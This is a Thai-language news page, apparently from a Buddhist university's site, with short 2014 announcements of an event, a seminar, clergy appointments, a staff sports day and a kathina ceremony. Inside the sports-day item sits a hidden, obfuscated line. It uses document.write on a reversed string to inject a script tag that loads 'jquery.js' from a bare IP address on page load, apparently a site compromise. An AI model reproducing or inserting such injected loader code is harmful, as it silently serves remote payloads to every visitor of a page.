ผ่าเพลง ผ่าธรรม นวัตกรรมรูปแบบใหม่ทางวิชาการ

สมาคมศิษย์เก่า มจร จัดงานผ่าเพลงผ่าธรรม นวัตกรรมรูปแบบใหม่ทางวิชาการ ( ครั้งที่ ๑) โดยมี ผศ.ดร.สมศักดิ์  บุญปู่ เป็นประธานเปิดงาน มีผู้บริหารคณาจารย์เข้าร่วมงานเป็นจำนวนมาก เช่น พระราชวรเมธี รองอธิการบดีฝ่ายบริหาร พระราชวรมุนี รองอธิการบดีฝ่ายกิจการนิสิต พระเมธีธรรมาจารย์ รองอธิการบดีฝ่ายประชาสัมพันธ์เเละเผยเเผ่ พระคูปริยัตกิตติธำรงค์ คณบดีคณะสังคมศาสตร์ พระครูปลัดมารุต วรมงฺคโลคณบดีคณะครุศาสตร์, พระมหาโชว์ ทสฺสนีโย ผู้อำนวยการสำนักส่งเสริมพระพุทธศาสนาและบริการสังคม และมีนักร้องที่มีชื่อเสียงเข้าร่วมร้องเพลงที่มีเนื้อหาธรรมะมากมายมาร่วมงาน เช่น พันตรีสุธี สุขสากล เป็นต้น ในวันที่...

นิมนต์/เรียนเชิญ ทุกท่านร่วมฟังการสัมมนาวิชาการทางพุทธจิตวิทยา เรื่อง “พุทธจิตวิทยาเพื่อพัฒนาชีวิต”

โดยพระเดชพระคุณพระพรหมบัณฑิต ศ.ดร. อธิการบดี มจร ตั้งเเต่เวลา ๑๓.๐๐ - ๑๖.๐๐ น. และพระมหาอ้าย ธีรปญฺโญ,ดร. บรรยายพิเศษเรื่อง ความหมาย และความสำคัญของสถานที่ประสูติ ตรัสรู้ ปฐมเทศนา และปรินิพพานที่ส่งผลต่อพุทธจิตวิทยา ตั้งเเต่เวลา ๐๙.๐๐ - ๑๑.๓๐ น. ในวันเสาร์ที่ ๑๕ พฤศจิกายน พ.ศ. ๒๕๕๗ ณ ห้องประชุม ๔๐๑ อาคารสำนักงานอธิการบดี มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย...

เจ้าพระคุณสมเด็จพระมหารัชมังคลาจารย์ ผู้ปฏิบัติหน้าที่สมเด็จพระสังฆราช มีบัญชาแต่งตั้งคณะเลขานุการผู้ปฏิบัติหน้าที่สมเด็จพระสังฆราช

วันที่ ๑๐ พฤศจิกายน ๒๕๕๗ เวลา ๒๐.๓๐ น. เจ้าประคุณสมเด็จพระมหารัชมังคลาจารย์ ผู้ปฏิบัติหน้าที่สมเด็จพระสังฆราช มีบัญชาแต่งตั้งคณะเลขานุการผู้ปฏิบัติหน้าที่สมเด็จพระสังฆราช ประกอบด้วย ๑.พระพรหมโมลี วัดปากน้ำ เขตภาษีเจริญ กทม. เป็นประธานคณะเลขานุการผู้ปฏิบัติหน้าที่สมเด็จพระสังฆราช ๒.พระพรหมบัณฑิต วัดประยุรวงศาวาส กทม. เป็นรองเป็นประธานคณะเลขานุการผู้ปฏิบัติหน้าที่สมเด็จพระสังฆราช ๓.พระราชสุตาภรณ์ วัดปากน้ำเขตภาษีเจริญ กทม. เป็นคณะเลขานุการผู้ปฏิบัติหน้าที่สมเด็จพระสังฆราช ๔.พระราชมังคลาจารย์ วัดปากน้ำ เขตภาษีเจริญ กทม....

ขอเชิญบุคลากรเข้าร่วมโครงการส่งเสริมสุขภาพและศักยภาพการปฏิบัติงานของบุคลากร มจร. อโศกเกมส์ ครั้งที่ ๙

ขอเชิญบุคลากรเข้าร่วมโครงการส่งเสริมสุขภาพและศักยภาพการปฏิบัติงานของบุคลากร  มจร. อโศกเกมส์ ครั้งที่ ๙ ณ โรงเรียนวัดไร่ขิงวิทยา ตำบลไร่ขิง อ.สามพราน จ.นครปฐม ระหว่างวันที่ ๗-๙ พฤศจิกายน ๒๕๕๗ Download กำหนดการ Download แผนที่สถานที่แข่งขัน Download ตารางการแข่งขัน document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

พิธีเจริญพระพุทธมนต์ สมโภชองค์กฐิน

ในวันเสาร์ ที่ ๒๕ ตุลาคม ๒๕๕๗ พระบาทสมเด็จพระเจ้าอยู่หัว ทรงพระกรุณาโปรดเกล้าฯ พระราชทานผ้าพระกฐิน ให้นายแพทย์รัศมี – คุณหญิงสมปอง วรรณิสสร ถวาย ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ตำบลลำไทร อำเภอวังน้อย จังหวัดพระนครศรีอยุธยา เวลา ๑๐.๓...๐ น. มีพิธีเจริญพระพุทธมนต์ สมโภชองค์กฐิน และถวายภัตตาหารเพลแด่คณะผู้บริหาร คณาจารย์ เจ้าหน้าที่ และพระนิสิต...
X